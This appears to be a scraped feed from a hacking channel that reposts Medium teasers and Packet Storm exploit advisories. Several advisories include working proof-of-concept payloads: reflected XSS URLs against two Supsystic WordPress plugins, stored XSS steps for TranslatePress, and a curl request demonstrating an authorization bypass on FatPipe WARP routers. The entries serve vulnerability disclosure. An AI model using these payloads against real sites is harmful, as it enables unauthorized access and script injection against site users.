Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Backdooring windows ISO
https://cdn-images-1.medium.com/max/1063/1*2APx2pC6qSa7ZfdCBWswXA.png
I have a passion for backdooring things . So this time after backdooring linux iso files i tried to backdoor windows ISO files . Adding…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Backdooring windows ISO
https://cdn-images-1.medium.com/max/1063/1*2APx2pC6qSa7ZfdCBWswXA.png
I have a passion for backdooring things . So this time after backdooring linux iso files i tried to backdoor windows ISO files . Adding…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Backdooring windows ISO
I have a passion for backdooring things . So this time after backdooring linux iso files i tried to backdoor windows ISO files . Adding…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Microsoft advierte sobre el malware FoggyWeb dirigido a servidores FS de Active Directory
https://cdn-images-1.medium.com/max/1386/0*MaD5d5AoCUSDH3l-
PUBLICADO EN 28 SEPTIEMBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Microsoft advierte sobre el malware FoggyWeb dirigido a servidores FS de Active Directory
https://cdn-images-1.medium.com/max/1386/0*MaD5d5AoCUSDH3l-
PUBLICADO EN 28 SEPTIEMBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Microsoft advierte sobre el malware FoggyWeb dirigido a servidores FS de Active Directory
PUBLICADO EN 28 SEPTIEMBRE, 2021POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hack The Box — Validation: Walkthrough (without Metasploit)
https://cdn-images-1.medium.com/max/600/1*ds9sa4p_EybvbDRWRzKh9w.png
Hack The Box — Validation: Walkthrough (without Metasploit) — OSCP | SQL Injection | Hacking | Hackthebox | Cyber Security
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hack The Box — Validation: Walkthrough (without Metasploit)
https://cdn-images-1.medium.com/max/600/1*ds9sa4p_EybvbDRWRzKh9w.png
Hack The Box — Validation: Walkthrough (without Metasploit) — OSCP | SQL Injection | Hacking | Hackthebox | Cyber Security
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hack The Box — Validation: Walkthrough (without Metasploit)
Hack The Box — Validation: Walkthrough (without Metasploit) — OSCP | SQL Injection | Hacking | Hackthebox | Cyber Security
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hello Neighbor
https://cdn-images-1.medium.com/max/1049/1*bPyvd9r_tYZFH-H31CgJvw.png
Going through my company’s Route 53 tables to see what obscure subdomains we had spun up to lead me to find an exposed “Enhanced Digital…
Continue reading on Techiepedia »
___________________________
@hacking_Attack
@Hacking_Video
Hello Neighbor
https://cdn-images-1.medium.com/max/1049/1*bPyvd9r_tYZFH-H31CgJvw.png
Going through my company’s Route 53 tables to see what obscure subdomains we had spun up to lead me to find an exposed “Enhanced Digital…
Continue reading on Techiepedia »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hello Neighbor
Going through my company’s Route 53 tables to see what obscure subdomains we had spun up to lead me to find an exposed “Enhanced Digital…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress TranslatePress 2.0.8 Cross Site Scripting
https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
WordPress TranslatePress plugin version 2.0.8 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress TranslatePress 2.0.8 Cross Site Scripting
https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
WordPress TranslatePress plugin version 2.0.8 suffers from a persistent cross site scripting vulnerability.
MD5 |
cb0dfac0cf52af1f4c77f09caf67ea09Download
# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 06-08-2021
# Exploit Author: Nosa Shandy (Apapedulimu)
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/
# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
# Version: 2.0.6
# Tested on: macOS 11.4
# CVE : CVE-2021-24610
Description:
The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "" with the preg_replace, the attacker can use the HTML Tag to execute javascript.
Step To Reproduce:
1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
2. Input Gettext String
3. Input the payload such as x
4. Save, The payload will be executed.
5. Look on the homepage will be affected.
Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress TranslatePress 2.0.8 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Contact Form 1.7.14 Cross Site Scripting
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
WordPress Contact Form plugin version 1.7.14 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Contact Form 1.7.14 Cross Site Scripting
https://2.bp.blogspot.com/-S-N0q2XL8x8/WWlu5FDj1eI/AAAAAAAAIJA/vGskVQb_QegQZ0-UZMHSDeFJ08ju6pdGQCLcBGAs/s1600/h104.png
WordPress Contact Form plugin version 1.7.14 suffers from a cross site scripting vulnerability.
MD5 |
ad3b8c07914e764e78a039113f3ce4a9Download
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276
1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Contact Form 1.7.14 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Cross Site Request Forgery
https://4.bp.blogspot.com/-khon6dqGLkI/WWlvkVAr7qI/AAAAAAAAIQw/JwPgE9u6PkcV9AqklLFI3rOjfEX9YXC4QCLcBGAs/s1600/h96.png
The application interface FatPipe Networks WARP/IPVPN/MPVPN version 10.2.2 allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Cross Site Request Forgery
https://4.bp.blogspot.com/-khon6dqGLkI/WWlvkVAr7qI/AAAAAAAAIQw/JwPgE9u6PkcV9AqklLFI3rOjfEX9YXC4QCLcBGAs/s1600/h96.png
The application interface FatPipe Networks WARP/IPVPN/MPVPN version 10.2.2 allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
MD5 |
ebc740be2b0dc7aea958ed27ca4a91bfDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Cross Site Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Popup 1.10.4 Cross Site Scripting
https://3.bp.blogspot.com/-Ct9xsH2cBRo/WWlviFueiJI/AAAAAAAAIQc/IuoXrqbibrUTnkZ-3FJLKgVXuEB0NPH5wCLcBGAs/s1600/h92.png
WordPress Popup plugin version 1.10.4 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Popup 1.10.4 Cross Site Scripting
https://3.bp.blogspot.com/-Ct9xsH2cBRo/WWlviFueiJI/AAAAAAAAIQc/IuoXrqbibrUTnkZ-3FJLKgVXuEB0NPH5wCLcBGAs/s1600/h92.png
WordPress Popup plugin version 1.10.4 suffers from a cross site scripting vulnerability.
MD5 |
34a0b77cf58a9d881b2693bb8571e695Download
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Popup 1.10.4 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
FatPipe Networks WARP 10.2.2 Authorization Bypass
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
FatPipe Networks WARP version 10.2.2 suffers from an authorization bypass vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
FatPipe Networks WARP 10.2.2 Authorization Bypass
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
FatPipe Networks WARP version 10.2.2 suffers from an authorization bypass vulnerability.
MD5 |
6ccac54a795446dd5b9905280e95e65dDownload
FatPipe Networks WARP 10.2.2 Authorization Bypass
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
Desc: Improper access control occurs when the application provides direct
access to objects based on user-supplied input. As a result of this vulnerability
attackers can bypass authorization and access resources behind protected
pages.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5682
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
30.05.2016
25.07.2021
--
$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
FatPipe Networks WARP 10.2.2 Authorization Bypass
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Configuration Disclosure
___________________________
@hacking_Attack
@Hacking_Video
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Configuration Disclosure
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Configuration Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.